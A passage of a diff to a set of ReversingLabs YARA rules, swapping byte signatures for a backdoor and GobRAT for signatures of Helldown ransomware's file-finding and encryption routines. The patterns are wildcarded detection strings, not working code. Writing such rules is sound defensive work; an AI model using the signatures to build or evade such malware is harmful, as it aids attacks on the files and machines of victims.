+            ?? ?? ?? 89 03 A1 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 00 85 C0 0F 84 ??
+            ?? ?? ?? 8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 50 ?? A1 ?? ?? ?? ?? 8B 0D ?? ??
+            ?? ?? C1 E1 ?? 01 C8 8B 00 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? C1 E2 ?? 01 D0 8B 10 89 D0 B9 ?? ?? ?? ?? 89 C3 B8 ?? ?? ?? ?? 89 DF F2
+            AE 89 C8 F7 D0 83 E8 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 83 C0 ?? A3 ?? ?? ?? ??
+            8B 45 ?? C1 E0 ?? 89 C2 8B 45 ?? 01 D0 8B 40 ?? 83 E0 ?? 85 C0 74 ?? 8B 45 ?? C1 E0
+            ?? 89 C2 8B 45 ?? 01 D0 89 04 24 E8 ?? ?? ?? ?? EB ?? 90 83 45 ?? ?? 8B 45 ?? 39 45
+            ?? 0F 82 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ??
+            ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 90 90 8D 65 ?? 5B 5F 5D C3
         }
-		$upload = {
-            28 ?? ?? ?? ?? 0A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 16 0B 38 ??
-            ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 06 02 7C ?? ?? ?? ??
-            7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 02 7C ?? ?? ?? ??
-            7B ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 72 ?? ?? ?? ?? A2 11 ?? 17 02 7C ??
-            ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? ?? 06
-            A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ??
-            7B ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07
-            14 6F ?? ?? ?? ?? 07 17 58 0B 07 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 3F
-            ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ??
-            ?? ?? ?? 7D ?? ?? ?? ?? DE 23 0D 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 2A
+		$encrypt_files_p1 = {
+            55 89 E5 57 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24 ?? ?? ?? ??
+            ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ??
+            ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45
+            ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01
+            D0 66 C7 00 ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ??
+            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89
+            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 89 55
+            ?? 83 7D ?? ?? 7F ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 77 ?? C7 44 24 ?? ?? ?? ?? ?? 8B
+            45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24
+            ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 45 ?? ?? ?? ?? ?? DF 6D ??
+            DD 5D ?? DD 45 ?? DD 05 ?? ?? ?? ?? DF E9 DD D8 76 ?? 8B 45 ?? 89 45 ?? EB ?? C7 45
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC
         }
-		$perform_request = {
-            05 6F ?? ?? ?? ?? 0A 06 04 3D ?? ?? ?? ?? 06 04 19 5B 18 5A 3F ?? ?? ?? ?? 05 16 06
-            19 5B 6F ?? ?? ?? ?? 0B 05 06 19 5B 06 19 5B 6F ?? ?? ?? ?? 0C 05 06 19 5B 18 5A 6F
-            ?? ?? ?? ?? 0D 02 07 28 ?? ?? ?? ?? 0B 02 08 28 ?? ?? ?? ?? 0C 02 09 28 ?? ?? ?? ??
-            0D 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 07
-            A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 08 A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 09
-            A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 28 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 02 7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 38 ?? ?? ?? ?? 06
-            04 19 5B 18 5A 3D ?? ?? ?? ?? 06 04 19 5B 3F ?? ?? ?? ?? 05 16 06 18 5B 6F ?? ?? ??
-            ?? 13 ?? 05 06 18 5B 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28
-            ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ??
-            A2 11 ?? 18 11 ?? A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 11 ?? A2 11 ?? 1B 72 ?? ??
-            ?? ?? A2 11 ?? 1C 02 28 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 7B ??
-            ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 2B ?? 02 05 28 ?? ?? ?? ?? 13 ?? 1D 8D ?? ??
-            ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 11 ?? A2 11 ?? 19 72
-            ?? ?? ?? ?? A2 11 ?? 1A 02 28 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 02
-            7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 05 2A
+		$encrypt_files_p2 = {
+            8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF
+            D0 C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 15 ??
+            ?? ?? ?? A1 ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? C7 04 24 ??
+            ?? ?? ?? A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ??
+            ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
+            ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 04 24 ?? ?? ?? ?? A1
+            ?? ?? ?? ?? FF D0 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89
+            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 75 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04
+            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B
+            45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ??
+            ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83
+            7D ?? ?? 74 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44
+            24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45
         }
-		$get_txt_record = {
-            14 0A 03 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ??
-            0D 09 08 08 8E 69 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ??
-            09 12 ?? 6F ?? ?? ?? ?? 13 ?? 09 6F ?? ?? ?? ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ??
-            ?? ?? 13 ?? 28 ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? DE ?? 26 72 ??
-            ?? ?? ?? 13 ?? DE ?? 11 ?? 2A
+		$encrypt_files_p3 = {
+            89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC
+            ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 39 55 ?? 7F ?? 39 55 ?? 7C ?? 39
+            45 ?? 77 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? C7 44 24
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ??
+            89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 8D 55 ?? 89 54 24 ?? 8B 55 ??
+            89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? BA ?? ?? ?? ?? 29 45 ??
+            19 55 ?? 83 7D ?? ?? 0F 8F ?? ?? ?? ?? 83 7D ?? ?? 78 ?? 83 7D ?? ?? 0F 87 ?? ?? ??
+            ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ??
+            ?? FF D0 83 EC ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0
         }
-		$main_loop = {
-            73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 18 16 16 6F ?? ?? ?? ?? 0A 06 28
-            ?? ?? ?? ?? 2D ?? 2A 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 2A 7E ?? ??
-            ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 12 ?? 7B ?? ?? ?? ?? 0D 12 ?? 7B
-            ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 7E ?? ?? ?? ?? 19 11 ?? 11 ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 14 80 ?? ?? ?? ?? 2A 11 ?? 7E ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 11 ?? 17 58 13 ?? 11 ?? 09 32 ?? 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0B 73 ??
-            ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ??
-            ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07
-            17 6F ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DD ?? ?? ?? ?? 26 DE ?? 2A
+		$find_files_p1 = {
+            55 89 E5 57 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C0 ?? C7 44 24
+            ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 8B 45 ?? 89 04 24
+            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 44
+            24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ??
+            89 D7 F2 AE 89 C8 F7 D0 8D 50 ?? 8B 45 ?? 01 D0 C7 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F
+            84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F B6 95 ?? ?? ??
+            ?? 0F B6 05 ?? ?? ?? ?? 0F B6 D2 0F B6 C0 29 C2 89 D0 85 C0 0F 84 ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ??
+            89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
+            E0 ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ??
+            ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83 C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24
+        }
+		$find_files_p2 = {
+            E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8B 45 ??
+            89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8
+            ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 D7 F2 AE 89 C8 F7 D0 8D
+            50 ?? 8B 45 ?? 01 D0 66 C7 00 ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ??
+            C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0
+        }
+		$find_files_p3 = {
+            89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04
+            24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 04
+            24 E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 01 D8 83
+            C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B
+            45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 44
+            24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 55 ?? 89 54 24 ?? 89 44 24
+            ?? C7 04 24 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 EB ?? 90 EB ?? 90 EB ?? 90 EB ?? 90 EB
+            ?? 90 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ??
+            85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89
+            04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $unpack_response_p* ) ) and ( $upload ) and ( $perform_request ) and ( $get_txt_record ) and ( $main_loop )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Linux_Backdoor_Gobrat : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Linux_Ransomware_Helldown : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects GobRAT backdoor."
+		description = "Yara rule that detects Helldown ransomware."
 		author = "ReversingLabs"
-		id = "390bd83e-ac43-511a-b07b-3dc3d9890353"
-		date = "2025-03-27"
-		modified = "2025-03-27"
+		id = "aca11cf1-2d73-5599-8027-a52b9dcd4757"
+		date = "2025-01-20"
+		modified = "2025-01-20"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.GobRAT.yara#L1-L168"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Linux.Ransomware.Helldown.yara#L1-L127"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ce29568231a4103663f4b478de3210e00e14b14eda7781f05ecf0cf576fc5ad2"
+		logic_hash = "b5572f537c87d113886d79768cfe89e46c00063333de612a4547c9a80f5826e1"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "GobRAT"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Helldown"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$get_local_address_p1 = {
-            49 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 83 C4 ?? 48 89 6C 24 ?? 48 8D 6C 24 ?? 48 83 3D ??
-            ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? 48 85 FF 75 ?? 48 85 DB 74 ?? 48 89 5C 24 ?? 31 C9
-            EB ?? 48 8B 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B 35 ?? ??
-            ?? ?? 48 8B 0D ?? ?? ?? ?? 4C 8B 05 ?? ?? ?? ?? 48 8B 6C 24 ?? 48 83 EC ?? C3 48 83
-            C0 ?? 48 89 D1 48 8B 50 ?? 4C 8D 0D ?? ?? ?? ?? 4C 39 08 74 ?? BA ?? ?? ?? ?? 48 89
-            4C 24 ?? 48 89 44 24 ?? 48 89 54 24 ?? 74 ?? 31 F6 EB ?? 48 8B 02 48 8B 5A ?? 48 8B
-            4A ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 48 8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B
-            5C 24 ?? 4C 8D 0D ?? ?? ?? ?? 31 F6 EB ?? 48 8B 54 24 ?? 48 8B 02 48 8B 5A ?? 48 8B
-            4A ?? E8 ?? ?? ?? ?? 83 F0 ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 8B 5C 24 ?? 4C 8D 0D
-            ?? ?? ?? ?? 89 C6 48 8B 44 24 ?? 40 84 F6 74 ?? 4C 8B 12 4C 8B 5A ?? 4C 8B 62 ?? 49
-            83 FB ?? 75 ?? 4C 89 D6 EB ?? 49 83 FB ?? 75 ?? 31 F6 E9 ?? ?? ?? ?? 48 8D 51 ?? 48
-            39 D3 0F 8F ?? ?? ?? ?? 0F 1F 40 ?? E9 ?? ?? ?? ?? 31 F6 48 85 F6 74 ?? 4C 89 D0 4C
-            89 DB 4C 89 E1 E8 ?? ?? ?? ?? 48 8B 35 ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 48 8B 3D ??
-            ?? ?? ?? 4C 8D 46 ?? 4C 39 C7 73 ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ??
-            ?? 48 89 D3 48 89 F1 4C 89 C6 E8 ?? ?? ?? ?? 48 89 0D ?? ?? ?? ?? 83 3D ?? ?? ?? ??
-            ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 48
-        }
-		$get_local_address_p2 = {
-            89 DE 48 8B 44 24 ?? 48 8B 5C 24 ?? 4C 8D 46 ?? 4C 89 05 ?? ?? ?? ?? 48 C1 E6 ?? 48
-            89 5C 32 ?? 48 8D 3C 32 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 04 32 EB ?? E8 ?? ?? ?? ??
-            48 8B 54 24 ?? 48 8B 02 48 8B 5A ?? 48 8B 4A ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B
-            35 ?? ?? ?? ?? 48 8D 56 ?? 48 8B 1D ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? 48 39 D7 73 ??
-            89 44 24 ?? 48 8D 05 ?? ?? ?? ?? 48 89 F1 48 89 D6 E8 ?? ?? ?? ?? 48 89 0D ?? ?? ??
-            ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 89 05 ?? ?? ?? ?? EB ?? 48 8D 3D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 89 DE 48 89 C3 8B 44 24 ?? 48 8D 56 ?? 48 89 15 ?? ?? ?? ?? 89 04 B3 48
-            8B 44 24 ?? 48 8B 4C 24 ?? 48 8B 5C 24 ?? 4C 8D 0D ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 FF
-            C6 48 83 FE ?? 7D ?? 45 0F B6 2C 32 45 84 ED 74 ?? E9 ?? ?? ?? ?? 41 80 7A ?? ?? 0F
-            1F 44 00 ?? 0F 85 ?? ?? ?? ?? 41 80 7A ?? ?? 0F 85 ?? ?? ?? ?? 49 8D 72
-        }
-		$get_mac_address_p1 = {
-            4C 8D 64 24 ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 89 AC 24 ?? ??
-            ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 83 3D ?? ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? 48 85 FF
-            75 ?? 48 85 DB 74 ?? 48 89 5C 24 ?? 31 C9 EB ?? 31 C0 31 DB 48 8B AC 24 ?? ?? ?? ??
-            48 81 C4 ?? ?? ?? ?? C3 48 8B 05 ?? ?? ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8B AC 24 ?? ??
-            ?? ?? 48 81 C4 ?? ?? ?? ?? C3 48 83 C0 ?? 48 89 D1 0F 10 00 0F 11 84 24 ?? ?? ?? ??
-            0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ?? 0F 11 84 24 ?? ?? ?? ?? 0F 10 40 ??
-            0F 11 84 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 85 D2 75
-            ?? 31 D2 31 F6 EB ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 89 54 24 ?? 48 89 B4
-            24 ?? ?? ?? ?? 48 8D 0C 52 48 8D 49 ?? 48 89 4C 24 ?? 48 8D 05 ?? ?? ?? ?? 31 DB 0F
-            1F 44 00 ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 7C 24 ?? 31
-            C9 31 DB EB ?? 48 89 D9 48 89 C3 31 C0 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 DA 48 89
